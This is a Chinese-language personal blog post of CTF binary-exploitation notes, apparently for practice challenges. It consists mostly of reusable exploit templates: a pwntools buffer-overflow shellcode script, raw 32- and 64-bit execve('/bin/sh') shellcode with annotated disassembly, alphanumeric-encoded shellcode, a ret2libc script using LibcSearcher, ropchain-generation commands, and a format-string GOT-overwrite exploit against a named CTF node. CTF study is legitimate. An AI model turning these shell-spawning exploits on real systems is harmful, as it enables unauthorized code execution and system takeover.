<!DOCTYPE html>
<html lang=zh>
<head>
    <!-- so meta -->
    <meta charset="utf-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="HandheldFriendly" content="True">
    <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=5" />
    <meta name="description" content="shellcode模板12345678from pwn import *#context(log_level&#x3D;&#x27;debug&#x27;,arch&#x3D;&#x27;amd64&#x27;, os&#x3D;&#x27;linux&#x27;) &#x2F;&#x2F;很重要一定要加上，可以知道代码哪出错误了a&#x3D;remote(&#x27;ip&#x27;,&#x27;port&#x27;)bass&#x3D;（找到bass可读可写的地">
<meta property="og:type" content="article">
<meta property="og:title" content="Hello~ lpp">
<meta property="og:url" content="http://example.com/2024/09/16/%E4%BA%8C%E8%BF%9B%E5%88%B6%E6%A8%A1%E6%9D%BF/index.html">
<meta property="og:site_name" content="Hello~ lpp">
<meta property="og:description" content="shellcode模板12345678from pwn import *#context(log_level&#x3D;&#x27;debug&#x27;,arch&#x3D;&#x27;amd64&#x27;, os&#x3D;&#x27;linux&#x27;) &#x2F;&#x2F;很重要一定要加上，可以知道代码哪出错误了a&#x3D;remote(&#x27;ip&#x27;,&#x27;port&#x27;)bass&#x3D;（找到bass可读可写的地">
<meta property="og:locale" content="zh_CN">
<meta property="article:published_time" content="2024-09-16T09:51:33.426Z">
<meta property="article:modified_time" content="2024-08-30T03:04:08.194Z">
<meta property="article:author" content="luyanpei">
<meta name="twitter:card" content="summary">
    
    
      
        
          <link rel="shortcut icon" href="/images/favicon.ico">
        
      
      
        
          <link rel="icon" type="image/png" href="/images/favicon-192x192.png" sizes="192x192">
        
      
      
        
          <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon.png">
        
      
    
    <!-- title -->
    <title>Hello~ lpp</title>
    <!-- async scripts -->
    <!-- Google Analytics -->


    <!-- Umami Analytics -->


    <!-- styles -->
    
<link rel="stylesheet" href="/css/style.css">

    <!-- persian styles -->
    
    <!-- rss -->
    
    
	<!-- mathjax -->
	
<meta name="generator" content="Hexo 7.3.0"></head>

<body class="max-width mx-auto px3 ltr">
    
      <div id="header-post">
  <a id="menu-icon" href="#" aria-label="目录"><i class="fa-solid fa-bars fa-lg"></i></a>
  <a id="menu-icon-tablet" href="#" aria-label="目录"><i class="fa-solid fa-bars fa-lg"></i></a>
  <a id="top-icon-tablet" href="#" aria-label="顶部" onclick="$('html, body').animate({ scrollTop: 0 }, 'fast');" style="display:none;"><i class="fa-solid fa-chevron-up fa-lg"></i></a>
  <span id="menu">
    <span id="nav">
      <ul>
        <!--
       --><li><a href="/">首页</a></li><!--
     --><!--
       --><li><a href="/about/">关于</a></li><!--
     --><!--
       --><li><a href="/archives/">归档</a></li><!--
     --><!--
       --><li><a target="_blank" rel="noopener" href="http://github.com/probberechts">项目</a></li><!--
     -->
      </ul>
    </span>
    <br/>
    <span id="actions">
      <ul>
        
        <li><a class="icon" aria-label="上一篇" href="/2024/09/16/%E4%BA%8C%E8%B0%88%E6%A0%88%E8%BF%81%E7%A7%BB/"><i class="fa-solid fa-chevron-left" aria-hidden="true" onmouseover="$('#i-prev').toggle();" onmouseout="$('#i-prev').toggle();"></i></a></li>
        
        
        <li><a class="icon" aria-label="下一篇" href="/2024/09/16/%E5%A4%9A%E8%BF%9B%E7%A8%8B%E4%B8%8B%E7%9A%84%E7%88%86%E7%A0%B4%EF%BC%88fork%EF%BC%89/"><i class="fa-solid fa-chevron-right" aria-hidden="true" onmouseover="$('#i-next').toggle();" onmouseout="$('#i-next').toggle();"></i></a></li>
        
        <li><a class="icon" aria-label="返回顶部" href="#" onclick="$('html, body').animate({ scrollTop: 0 }, 'fast');"><i class="fa-solid fa-chevron-up" aria-hidden="true" onmouseover="$('#i-top').toggle();" onmouseout="$('#i-top').toggle();"></i></a></li>
        <li><a class="icon" aria-label="分享文章" href="#"><i class="fa-solid fa-share-alt" aria-hidden="true" onmouseover="$('#i-share').toggle();" onmouseout="$('#i-share').toggle();" onclick="$('#share').toggle();return false;"></i></a></li>
      </ul>
      <span id="i-prev" class="info" style="display:none;">上一篇</span>
      <span id="i-next" class="info" style="display:none;">下一篇</span>
      <span id="i-top" class="info" style="display:none;">返回顶部</span>
      <span id="i-share" class="info" style="display:none;">分享文章</span>
    </span>
    <br/>
    <div id="share" style="display: none">
      <ul>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.facebook.com/sharer.php?u=http://example.com/2024/09/16/%E4%BA%8C%E8%BF%9B%E5%88%B6%E6%A8%A1%E6%9D%BF/"><i class="fab fa-facebook " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://twitter.com/share?url=http://example.com/2024/09/16/%E4%BA%8C%E8%BF%9B%E5%88%B6%E6%A8%A1%E6%9D%BF/&text="><i class="fab fa-twitter " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.linkedin.com/shareArticle?url=http://example.com/2024/09/16/%E4%BA%8C%E8%BF%9B%E5%88%B6%E6%A8%A1%E6%9D%BF/&title="><i class="fab fa-linkedin " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://pinterest.com/pin/create/bookmarklet/?url=http://example.com/2024/09/16/%E4%BA%8C%E8%BF%9B%E5%88%B6%E6%A8%A1%E6%9D%BF/&is_video=false&description="><i class="fab fa-pinterest " aria-hidden="true"></i></a></li>
  <li><a class="icon" href="mailto:?subject=&body=Check out this article: http://example.com/2024/09/16/%E4%BA%8C%E8%BF%9B%E5%88%B6%E6%A8%A1%E6%9D%BF/"><i class="fa-solid fa-envelope " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://getpocket.com/save?url=http://example.com/2024/09/16/%E4%BA%8C%E8%BF%9B%E5%88%B6%E6%A8%A1%E6%9D%BF/&title="><i class="fab fa-get-pocket " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://reddit.com/submit?url=http://example.com/2024/09/16/%E4%BA%8C%E8%BF%9B%E5%88%B6%E6%A8%A1%E6%9D%BF/&title="><i class="fab fa-reddit " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.stumbleupon.com/submit?url=http://example.com/2024/09/16/%E4%BA%8C%E8%BF%9B%E5%88%B6%E6%A8%A1%E6%9D%BF/&title="><i class="fab fa-stumbleupon " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://digg.com/submit?url=http://example.com/2024/09/16/%E4%BA%8C%E8%BF%9B%E5%88%B6%E6%A8%A1%E6%9D%BF/&title="><i class="fab fa-digg " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.tumblr.com/share/link?url=http://example.com/2024/09/16/%E4%BA%8C%E8%BF%9B%E5%88%B6%E6%A8%A1%E6%9D%BF/&name=&description="><i class="fab fa-tumblr " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://news.ycombinator.com/submitlink?u=http://example.com/2024/09/16/%E4%BA%8C%E8%BF%9B%E5%88%B6%E6%A8%A1%E6%9D%BF/&t="><i class="fab fa-hacker-news " aria-hidden="true"></i></a></li>
</ul>

    </div>
    
    
      <div id="toc">
        <ol class="toc"><li class="toc-item toc-level-4"><a class="toc-link" href="#shellcode%E6%A8%A1%E6%9D%BF"><span class="toc-number">1.</span> <span class="toc-text">shellcode模板</span></a><ol class="toc-child"><li class="toc-item toc-level-6"><a class="toc-link" href="#%E7%94%B1%E4%BA%8E%E4%BD%BF%E7%94%A8-shellcraft-%E9%BB%98%E8%AE%A4%E7%94%9F%E6%88%90%E7%9A%84%E5%AD%97%E8%8A%82%E6%95%B0%E6%98%AF-0x30%EF%BC%8C%E5%A6%82%E6%9E%9C%E5%B0%8F%E4%BA%8E%E6%AD%A4%E5%AD%97%E8%8A%82%E6%95%B0%E5%88%99%E9%9C%80%E8%A6%81%E8%87%AA%E5%B7%B1%E5%86%99shellcode%E3%80%82"><span class="toc-number">1.0.1.</span> <span class="toc-text">由于使用 shellcraft 默认生成的字节数是 0x30，如果小于此字节数则需要自己写shellcode。</span></a></li><li class="toc-item toc-level-6"><a class="toc-link" href="#%E8%AF%B4%E6%98%8E%EF%BC%9A"><span class="toc-number">1.0.2.</span> <span class="toc-text">说明：</span></a></li></ol></li></ol></li><li class="toc-item toc-level-4"><a class="toc-link" href="#%E5%8F%AF%E8%A7%81%E5%AD%97%E7%AC%A6%E7%9A%84shellcode%EF%BC%9A%E9%9C%80%E8%A6%81%E8%BF%9B%E8%A1%8C%E8%BD%AC%E6%8D%A2%EF%BC%88alpha3-master%E5%B7%A5%E5%85%B7%EF%BC%89"><span class="toc-number">2.</span> <span class="toc-text">可见字符的shellcode：需要进行转换（alpha3-master工具）</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#ret2libc%EF%BC%8864bit%EF%BC%89%E6%A8%A1%E6%9D%BF"><span class="toc-number">3.</span> <span class="toc-text">ret2libc（64bit）模板</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#%E8%87%AA%E5%8A%A8%E5%8C%96-ret2csu"><span class="toc-number">4.</span> <span class="toc-text">自动化(ret2csu)</span></a></li></ol></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E6%A0%BC%E5%BC%8F%E5%8C%96%E5%AD%97%E7%AC%A6%E4%B8%B2%E6%9B%BF%E6%8D%A2%E5%9C%B0%E5%9D%80"><span class="toc-number"></span> <span class="toc-text">格式化字符串替换地址</span></a>
      </div>
    
  </span>
</div>

    
    <div class="content index py4 ">
        
        <article class="post h-entry" itemscope itemtype="http://schema.org/BlogPosting">
  <header>
    
    <h1 class="posttitle p-name" itemprop="name headline">
        
    </h1>



    <div class="meta">
      <span class="author p-author h-card" itemprop="author" itemscope itemtype="http://schema.org/Person">
        <span class="p-name" itemprop="name">luyanpei</span>
      </span>
      
    <div class="postdate">
      
        <time datetime="2024-09-16T09:51:33.426Z" class="dt-published" itemprop="datePublished">2024-09-16</time>
        
      
    </div>


      

      

    </div>
  </header>
  

  <div class="content e-content" itemprop="articleBody">
    <h4 id="shellcode模板"><a href="#shellcode模板" class="headerlink" title="shellcode模板"></a>shellcode模板</h4><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><code class="hljs python"><span class="hljs-keyword">from</span> pwn <span class="hljs-keyword">import</span> *<br><span class="hljs-comment">#context(log_level=&#x27;debug&#x27;,arch=&#x27;amd64&#x27;, os=&#x27;linux&#x27;) //很重要一定要加上，可以知道代码哪出错误了</span><br>a=remote(<span class="hljs-string">&#x27;ip&#x27;</span>,<span class="hljs-string">&#x27;port&#x27;</span>)<br>bass=（找到bass可读可写的地址）<br>shellcode=asm(shellcraft.sh())<br>payload=shellcode.ljust(<span class="hljs-number">0x108</span>，<span class="hljs-string">b&quot;a&quot;</span>)+p64(bass)//小端序填满多少个字节，然后返回bass段<br>a.sendline(payload)<br>a.interactive()<br></code></pre></td></tr></table></figure>

<h6 id="由于使用-shellcraft-默认生成的字节数是-0x30，如果小于此字节数则需要自己写shellcode。"><a href="#由于使用-shellcraft-默认生成的字节数是-0x30，如果小于此字节数则需要自己写shellcode。" class="headerlink" title="由于使用 shellcraft 默认生成的字节数是 0x30，如果小于此字节数则需要自己写shellcode。"></a>由于使用 shellcraft 默认生成的字节数是 0x30，如果小于此字节数则需要自己写shellcode。</h6><p>32 位 短字节 shellcode -&gt; 21 字节 \x6a\x0b\x58\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x31\xc9\xcd\x80</p>
<p>64 位 较短的 shellcode -&gt;23 字节 \x48\x31\xf6\x56\x48\xbf\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x57\x54\x5f\x6a\x3b\x58\x99\x0f \x05</p>
<h6 id="说明："><a href="#说明：" class="headerlink" title="说明："></a>说明：</h6><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><code class="hljs asm">\x48\x31\xf6             ; xor    rsi, rsi       ; 清零 rsi 寄存器<br>\x56                     ; push   rsi            ; 将 rsi（现在是0）推入栈中，作为 execve 的第三个参数 envp<br>\x48\xbf\x2f\x62\x69\x6e\x2f\x2f\x73\x68 ; movabs rdi, 0x68732f2f6e69622f ; 将 &#x27;/bin//sh&#x27; 字符串的地址移动到 rdi<br>\x57                     ; push   rdi            ; 将 rdi（字符串地址）推入栈中<br>\x54                     ; push   rsp            ; 将栈指针 rsp 推入栈中，作为 execve 的第二个参数 argv<br>\x5f                     ; pop    rdi            ; 弹出栈顶元素到 rdi，rdi 现在指向 argv<br>\x6a\x3b                 ; push   0x3b           ; 推送 0x3b（execve 系统调用号）到栈中<br>\x58                     ; pop    rax            ; 弹出栈顶元素到 rax，rax 现在是 0x3b<br>\x99                     ; cdq                   ; 清零 rdx 寄存器（扩展eax到edx:eax，因为eax已经是0）<br>\x0f\x05                 ; syscall               ; 执行系统调用，调用 execve(&#x27;/bin//sh&#x27;, argv, envp)<br></code></pre></td></tr></table></figure>

<p>$$<br>清零 rsi 寄存器，因为 execve 系统调用需要一个空的环境变量指针 envp。<br>将 rsi 的值（0）推入栈中，作为 execve 的 envp 参数。<br>将字符串 &#x2F;bin&#x2F;&#x2F;sh 的地址移动到 rdi 寄存器，这是 execve 要执行的程序路径。<br>将 rdi 的值推入栈中，以便稍后作为 argv[0] 使用。<br>将栈指针 rsp 推入栈中，这样做是为了获取 argv 数组的地址。<br>将栈顶的值弹出到 rdi，现在 rdi 指向 argv 数组。<br>将 execve 系统调用的编号（0x3b）推入栈中。<br>将栈顶的值弹出到 rax，现在 rax 包含 execve 的系统调用号。<br>通过 cdq 清零 rdx 寄存器，因为 execve 需要一个空的 argv 终止符。<br>执行 syscall 指令，调用 execve(‘&#x2F;bin&#x2F;&#x2F;sh’, argv, envp) 来执行一个 shell。<br>$$</p>
<h4 id="可见字符的shellcode：需要进行转换（alpha3-master工具）"><a href="#可见字符的shellcode：需要进行转换（alpha3-master工具）" class="headerlink" title="可见字符的shellcode：需要进行转换（alpha3-master工具）"></a>可见字符的shellcode：需要进行转换（alpha3-master工具）</h4><p>64位：</p>
<p>Ph0666TY1131Xh333311k13XjiV11Hc1ZXYf1TqIHf9kDqW02DqX0D1Hu3M2G0Z2o4H0u0P160Z0g7O0Z0C100y5O3G020B2n060N4q0n2t0B0001010H3S2y0Y0O0n0z01340d2F4y8P115l1n0J0h0a070t</p>
<p>32位：</p>
<p>PYIIIIIIIIIIQZVTX30VX4AP0A3HH0A00ABAABTAAQ2AB2BB0BBXP8ACJJISZTK1HMIQBSVCX6MU3K9M7CXVOSC3XS0BHVOBBE9RNLIJC62ZH5X5PS0C0FOE22I2NFOSCRHEP0WQCK9KQ8MK0AA</p>
<h4 id="ret2libc（64bit）模板"><a href="#ret2libc（64bit）模板" class="headerlink" title="ret2libc（64bit）模板"></a>ret2libc（64bit）模板</h4><p>libc做题姿势：</p>
<ol>
<li>ropper –file babyrop –search “pop rdi”（寻找可用的ret指令）</li>
<li></li>
</ol>
<p>from pwn import *<br>from LibcSearcher import *<br>#p&#x3D;remote(‘’,)<br>p&#x3D;process(‘’)<br>elf&#x3D;ELF(‘’)</p>
<p>#偏移<br>move&#x3D;<br>def get_addr():<br>return u64(p.recvuntil(b’\x7f’)[-6:].ljust(8, b’\x00’))      #接收泄露函数地址的函数</p>
<p>#地址<br>pop_rdi&#x3D;<br>ret&#x3D;<br>function_got&#x3D;elf.got[‘’]<br>function_plt&#x3D;elf.plt[‘’]<br>main&#x3D;elf.sym[‘main’]</p>
<p>#payload1<br>payload1&#x3D;b’a’*(move+8)+p64(pop_rdi)+p64(function_got)+p64(function_plt)+p64(main)</p>
<p>#接收<br>#p.recvuntil(‘’)</p>
<p>#发送payload<br>p.sendline(payload1)</p>
<p>#接收地址<br>target_addr&#x3D;get_addr()</p>
<p>#print(hex(target_addr))</p>
<p>#LibcSearcher匹配地址找system和binsh<br>libc&#x3D;LibcSearcher(‘function’,target_addr)<br>addr&#x3D;target_addr-libc.dump(‘function’)<br>binsh&#x3D;addr+libc.dump(‘str_bin_sh’)<br>sys&#x3D;addr+libc.dump(‘system’)</p>
<p>#payload2<br>payload2&#x3D;b’a’*(move+8)+p64(ret)+p64(pop_rdi)+p64(binsh)+p64(sys)</p>
<p>#接收<br>#p.recvuntil(‘’)</p>
<p> line &#x3D; p.recvline().decode().strip()#.decode()：将接收到的字节串转换为Python字符串。#.strip()：去除字符串开头和结尾的空格和换行符。match &#x3D; re.search(r’0x[0-9a-fA-F]+’, line)value &#x3D; match.group(0)#返回第一个匹配到的字符串python</p>
<p>p.interactive()</p>
<h4 id="自动化-ret2csu"><a href="#自动化-ret2csu" class="headerlink" title="自动化(ret2csu)"></a>自动化(ret2csu)</h4><p>对于静态生成的程序可以使用ropper和ROPgadget来直接生成ropchain<br>ropper–file name –chain execveropper–file name –chain execve<br>ROPgadget–binary name –ropchain</p>
<p>input()是接受字符串类型的输入，也就是说他会把用户输入的所有东西转换为字符串型，当然数字被解析为字符串类型的时候依然是数字，被解析为整型的时候也是数字，看你需要什么类型，int()是转换函数，int（input（））的意思是把input接收的字符串类型转换为整型</p>
<h3 id="格式化字符串替换地址"><a href="#格式化字符串替换地址" class="headerlink" title="格式化字符串替换地址"></a>格式化字符串替换地址</h3><figure class="highlight routeros"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><code class="hljs routeros"><span class="hljs-keyword">from</span> pwn import *<br>context(<span class="hljs-attribute">log_level</span>=<span class="hljs-string">&#x27;debug&#x27;</span>,arch=&#x27;i386&#x27;,os=&#x27;linux&#x27;)<br><span class="hljs-comment">#a=process(&#x27;./babyfmt&#x27;)</span><br><span class="hljs-attribute">a</span>=remote(&#x27;node5.anna.nssctf.cn&#x27;,28508)<br><span class="hljs-attribute">elf</span>=ELF(&#x27;./babyfmt&#x27;)<br><span class="hljs-attribute">offest</span>=11<br><span class="hljs-attribute">system_plt</span>=elf.symbols[<span class="hljs-string">&#x27;backdoor&#x27;</span>]<br><span class="hljs-attribute">printf_got</span>=elf.got[<span class="hljs-string">&#x27;printf&#x27;</span>]<br><br><span class="hljs-attribute">payload</span>=fmtstr_payload(offest,&#123;printf_got:system_plt&#125;)<br>a.sendline(payload)<br>a.interactive()<br></code></pre></td></tr></table></figure>




  </div>
</article>



        
          <div id="footer-post-container">
  <div id="footer-post">

    <div id="nav-footer" style="display: none">
      <ul>
        
          <li><a href="/">首页</a></li>
        
          <li><a href="/about/">关于</a></li>
        
          <li><a href="/archives/">归档</a></li>
        
          <li><a target="_blank" rel="noopener" href="http://github.com/probberechts">项目</a></li>
        
      </ul>
    </div>

    
    
      <div id="toc-footer" style="display: none">
        <ol class="toc"><li class="toc-item toc-level-4"><a class="toc-link" href="#shellcode%E6%A8%A1%E6%9D%BF"><span class="toc-number">1.</span> <span class="toc-text">shellcode模板</span></a><ol class="toc-child"><li class="toc-item toc-level-6"><a class="toc-link" href="#%E7%94%B1%E4%BA%8E%E4%BD%BF%E7%94%A8-shellcraft-%E9%BB%98%E8%AE%A4%E7%94%9F%E6%88%90%E7%9A%84%E5%AD%97%E8%8A%82%E6%95%B0%E6%98%AF-0x30%EF%BC%8C%E5%A6%82%E6%9E%9C%E5%B0%8F%E4%BA%8E%E6%AD%A4%E5%AD%97%E8%8A%82%E6%95%B0%E5%88%99%E9%9C%80%E8%A6%81%E8%87%AA%E5%B7%B1%E5%86%99shellcode%E3%80%82"><span class="toc-number">1.0.1.</span> <span class="toc-text">由于使用 shellcraft 默认生成的字节数是 0x30，如果小于此字节数则需要自己写shellcode。</span></a></li><li class="toc-item toc-level-6"><a class="toc-link" href="#%E8%AF%B4%E6%98%8E%EF%BC%9A"><span class="toc-number">1.0.2.</span> <span class="toc-text">说明：</span></a></li></ol></li></ol></li><li class="toc-item toc-level-4"><a class="toc-link" href="#%E5%8F%AF%E8%A7%81%E5%AD%97%E7%AC%A6%E7%9A%84shellcode%EF%BC%9A%E9%9C%80%E8%A6%81%E8%BF%9B%E8%A1%8C%E8%BD%AC%E6%8D%A2%EF%BC%88alpha3-master%E5%B7%A5%E5%85%B7%EF%BC%89"><span class="toc-number">2.</span> <span class="toc-text">可见字符的shellcode：需要进行转换（alpha3-master工具）</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#ret2libc%EF%BC%8864bit%EF%BC%89%E6%A8%A1%E6%9D%BF"><span class="toc-number">3.</span> <span class="toc-text">ret2libc（64bit）模板</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#%E8%87%AA%E5%8A%A8%E5%8C%96-ret2csu"><span class="toc-number">4.</span> <span class="toc-text">自动化(ret2csu)</span></a></li></ol></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E6%A0%BC%E5%BC%8F%E5%8C%96%E5%AD%97%E7%AC%A6%E4%B8%B2%E6%9B%BF%E6%8D%A2%E5%9C%B0%E5%9D%80"><span class="toc-number"></span> <span class="toc-text">格式化字符串替换地址</span></a>
      </div>
    

    <div id="share-footer" style="display: none">
      <ul>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.facebook.com/sharer.php?u=http://example.com/2024/09/16/%E4%BA%8C%E8%BF%9B%E5%88%B6%E6%A8%A1%E6%9D%BF/"><i class="fab fa-facebook fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://twitter.com/share?url=http://example.com/2024/09/16/%E4%BA%8C%E8%BF%9B%E5%88%B6%E6%A8%A1%E6%9D%BF/&text="><i class="fab fa-twitter fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.linkedin.com/shareArticle?url=http://example.com/2024/09/16/%E4%BA%8C%E8%BF%9B%E5%88%B6%E6%A8%A1%E6%9D%BF/&title="><i class="fab fa-linkedin fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://pinterest.com/pin/create/bookmarklet/?url=http://example.com/2024/09/16/%E4%BA%8C%E8%BF%9B%E5%88%B6%E6%A8%A1%E6%9D%BF/&is_video=false&description="><i class="fab fa-pinterest fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" href="mailto:?subject=&body=Check out this article: http://example.com/2024/09/16/%E4%BA%8C%E8%BF%9B%E5%88%B6%E6%A8%A1%E6%9D%BF/"><i class="fa-solid fa-envelope fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://getpocket.com/save?url=http://example.com/2024/09/16/%E4%BA%8C%E8%BF%9B%E5%88%B6%E6%A8%A1%E6%9D%BF/&title="><i class="fab fa-get-pocket fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://reddit.com/submit?url=http://example.com/2024/09/16/%E4%BA%8C%E8%BF%9B%E5%88%B6%E6%A8%A1%E6%9D%BF/&title="><i class="fab fa-reddit fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.stumbleupon.com/submit?url=http://example.com/2024/09/16/%E4%BA%8C%E8%BF%9B%E5%88%B6%E6%A8%A1%E6%9D%BF/&title="><i class="fab fa-stumbleupon fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://digg.com/submit?url=http://example.com/2024/09/16/%E4%BA%8C%E8%BF%9B%E5%88%B6%E6%A8%A1%E6%9D%BF/&title="><i class="fab fa-digg fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.tumblr.com/share/link?url=http://example.com/2024/09/16/%E4%BA%8C%E8%BF%9B%E5%88%B6%E6%A8%A1%E6%9D%BF/&name=&description="><i class="fab fa-tumblr fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://news.ycombinator.com/submitlink?u=http://example.com/2024/09/16/%E4%BA%8C%E8%BF%9B%E5%88%B6%E6%A8%A1%E6%9D%BF/&t="><i class="fab fa-hacker-news fa-lg" aria-hidden="true"></i></a></li>
</ul>

    </div>

    <div id="actions-footer">
        <a id="menu" class="icon" href="#" onclick="$('#nav-footer').toggle();return false;"><i class="fa-solid fa-bars fa-lg" aria-hidden="true"></i> 菜单</a>
        
          <a id="toc" class="icon" href="#" onclick="$('#toc-footer').toggle();return false;"><i class="fa-solid fa-list fa-lg" aria-hidden="true"></i> 目录</a>
        
        <a id="share" class="icon" href="#" onclick="$('#share-footer').toggle();return false;"><i class="fa-solid fa-share-alt fa-lg" aria-hidden="true"></i> 分享</a>
        <a id="top" style="display:none" class="icon" href="#" onclick="$('html, body').animate({ scrollTop: 0 }, 'fast');"><i class="fa-solid fa-chevron-up fa-lg" aria-hidden="true"></i> 返回顶部</a>
    </div>

  </div>
</div>

        
        <footer id="footer">
  <div class="footer-left">
    Copyright &copy;
    
    
    2016-2024
    luyanpei
  </div>
  <div class="footer-right">
    <nav>
      <ul>
        <!--
       --><li><a href="/">首页</a></li><!--
     --><!--
       --><li><a href="/about/">关于</a></li><!--
     --><!--
       --><li><a href="/archives/">归档</a></li><!--
     --><!--
       --><li><a target="_blank" rel="noopener" href="http://github.com/probberechts">项目</a></li><!--
     -->
      </ul>
    </nav>
  </div>
</footer>

    </div>
    <!-- styles -->



  <link rel="preload" as="style" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.4.0/css/all.min.css" crossorigin="anonymous" onload="this.onload=null;this.rel='stylesheet'"/>


    <!-- jquery -->

  <script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.6.0/jquery.min.js" crossorigin="anonymous"></script>




<!-- clipboard -->

  
    <script src="https://cdnjs.cloudflare.com/ajax/libs/clipboard.js/2.0.7/clipboard.min.js" crossorigin="anonymous"></script>
  
  <script type="text/javascript">
  $(function() {
    // copy-btn HTML
    var btn = "<span class=\"btn-copy tooltipped tooltipped-sw\" aria-label=\"复制到粘贴板！\">";
    btn += '<i class="fa-regular fa-clone"></i>';
    btn += '</span>';
    // mount it!
    $(".highlight table").before(btn);
    var clip = new ClipboardJS('.btn-copy', {
      text: function(trigger) {
        return Array.from(trigger.nextElementSibling.querySelectorAll('.code')).reduce((str,it)=>str+it.innerText+'\n','')
      }
    });
    clip.on('success', function(e) {
      e.trigger.setAttribute('aria-label', "复制成功！");
      e.clearSelection();
    })
  })
  </script>


<script src="/js/main.js"></script>

<!-- search -->

<!-- Baidu Analytics -->

<!-- Cloudflare Analytics -->

<!-- Disqus Comments -->

<!-- utterances Comments -->

</body>
</html>
